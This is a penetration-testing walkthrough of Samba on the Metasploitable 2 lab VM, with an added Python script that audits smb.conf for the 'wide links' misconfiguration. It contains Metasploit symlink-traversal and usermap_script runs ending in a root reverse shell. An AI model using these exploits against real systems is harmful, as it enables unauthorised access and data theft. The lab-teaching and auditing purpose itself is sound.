Metasploitable 2: TCP port 139 – netbios-ssn
Windows systems open port 139; the tool psshutdown.exe can use it to shut down a computer remotely. Samba can run on systems other than Microsoft Windows, for example UNIX, Linux, IBM System, OpenVMS and others. Samba uses the TCP/IP protocol. It lets a host interact with Windows clients or servers while behaving like a file or print server. Smbd is the service daemon that is part of Samba; it mainly provides file sharing and printer services, and clients talk to it with the SMB protocol. We can use smbclient to browse a Samba server.
root@gnu:~# smbclient -U root -L 192.168.1.111
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Server               Comment
	---------            -------
	KEE-4
	METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)
	WIN-01406122018
	WIN-V300QDH8H0C

	Workgroup            Master
	---------            -------
	WORKGROUP            METASPLOITABLE
root@gnu:~# smbclient -U root //192.168.1.111/tmp
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Jul 29 11:28:03 2014
  ..                                 DR        0  Sun May 20 14:36:12 2012
  .ICE-unix                          DH        0  Tue Jul 29 20:46:47 2014
  .X11-unix                          DH        0  Tue Jul 29 08:47:57 2014
  .X0-lock                           HR       11  Tue Jul 29 08:47:57 2014
  4464.jsvc_up                        R        0  Tue Jul 29 08:48:12 2014

		56891 blocks of size 131072. 42371 blocks available
smb: \> get
get <filename> [localname]
smb: \> get 4464.jsvc_up
NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up
A user named kcopedarookie posted a 0day video on YouTube in which smbclient is used to download /etc/passwd. This is caused by an insecure default configuration. Setting wide links = no in smb.conf and restarting smbd fixes the problem.
msf auxiliary(samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.1.111    yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE   tmp              yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > run
The problem above arises when two features meet. Each is useful to an administrator on its own, but combined they give a logged-in user access to any file on the system. By default Samba uses "wide links = yes", which lets an administrator add symbolic links inside a share so that clients can access them. For example:

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

The administrator can add a link:

ln -s /etc/passwd /tmp/passwd

An SMB/CIFS client will then see a file named "passwd".
root@gnu:~# smbclient -U root //192.168.1.111/tmp
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Jul 29 11:48:25 2014
  ..                                 DR        0  Sun May 20 14:36:12 2012
  .ICE-unix                          DH        0  Tue Jul 29 20:46:47 2014
  .X11-unix                          DH        0  Tue Jul 29 08:47:57 2014
  .X0-lock                           HR       11  Tue Jul 29 08:47:57 2014
  4464.jsvc_up                        R        0  Tue Jul 29 08:48:12 2014
  rootfs                             DR        0  Sun May 20 14:36:12 2012

		56891 blocks of size 131072. 42371 blocks available
smb: \> get 4464.jsvc_up
NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up
smb: \> cd rootfs\
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 14:36:12 2012
  ..                                 DR        0  Sun May 20 14:36:12 2012
  initrd                             DR        0  Tue Mar 16 18:57:40 2010
  media                              DR        0  Tue Mar 16 18:55:52 2010
  bin                                DR        0  Sun May 13 23:35:33 2012
  lost+found                         DR        0  Tue Mar 16 18:55:15 2010
  mnt                                DR        0  Wed Apr 28 16:16:56 2010
  sbin                               DR        0  Sun May 13 21:54:53 2012
  initrd.img                          R  7929183  Sun May 13 23:35:56 2012
  home                               DR        0  Fri Apr 16 02:16:02 2010
  lib                                DR        0  Sun May 13 23:35:22 2012
  usr                                DR        0  Wed Apr 28 00:06:37 2010
  proc                               DR        0  Tue Jul 29 20:46:33 2014
  root                               DR        0  Tue Jul 29 08:47:57 2014
  sys                                DR        0  Tue Jul 29 20:46:34 2014
  boot                               DR        0  Sun May 13 23:36:28 2012
  nohup.out                           R     8705  Tue Jul 29 08:47:57 2014
  etc                                DR        0  Tue Jul 29 08:47:53 2014
  dev                                DR        0  Tue Jul 29 20:46:48 2014
  vmlinuz                             R  1987288  Thu Apr 10 12:55:41 2008
  opt                                DR        0  Tue Mar 16 18:57:39 2010
  var                                DR        0  Sun May 20 17:30:19 2012
  cdrom                              DR        0  Tue Mar 16 18:55:51 2010
  tmp                                 D        0  Tue Jul 29 11:48:25 2014
  srv                                DR        0  Tue Mar 16 18:57:38 2010

		56891 blocks of size 131072. 42371 blocks available
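To find the misconfiguration described above on your own hosts before someone else does, here is an added Python example (not code from the original page) that audits an smb.conf for shares where wide links are effectively on and the share is guest-accessible or writable. It parses a constructed sample config modelled on the [tmp] share quoted above and assumes the Samba 3.0.x default of wide links = yes when the option is unset.

```python
import re

# Constructed sample smb.conf, modelled on the [tmp] share quoted on the page.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   # wide links is left unset here: Samba 3.0.x defaults it to yes

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

[print$]
   path = /var/lib/samba/printers
   read only = yes
   wide links = no
"""

TRUTHY = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Return {section: {key: value}}; keys/values lower-cased, comments and blanks skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections[current] = {}
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip().lower()
    return sections

def audit_wide_links(text, default_wide_links="yes"):
    """List (share, path, guest, writable) where wide links are on and access is broad.
    Effective value: share-level setting > [global] setting > assumed Samba default."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    for name, share in conf.items():
        if name == "global":
            continue
        wide = share.get("wide links", glob.get("wide links", default_wide_links)) in TRUTHY
        guest = share.get("guest ok", glob.get("guest ok", "no")) in TRUTHY
        writable = (share.get("read only", glob.get("read only", "yes")) not in TRUTHY
                    or share.get("writable", share.get("writeable", "no")) in TRUTHY)
        if wide and (guest or writable):
            findings.append((name, share.get("path", "?"), guest, writable))
    return findings

if __name__ == "__main__":
    for name, path, guest, writable in audit_wide_links(SAMPLE_SMB_CONF):
        print(f"[{name}] path={path} guest={guest} writable={writable}: set 'wide links = no' in [global]")
```

Re-run the audit after adding wide links = no to [global]; the [tmp] finding disappears because the share inherits the global value.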
We can use the usermap_script exploit module to obtain a shell on the Samba host.
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(usermap_script) > run

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7UDa3hwWyQYwH9FP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7UDa3hwWyQYwH9FP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.113:4444 -> 192.168.1.111:47271) at 2014-07-29 23:49:04 -0400

id
uid=0(root) gid=0(root)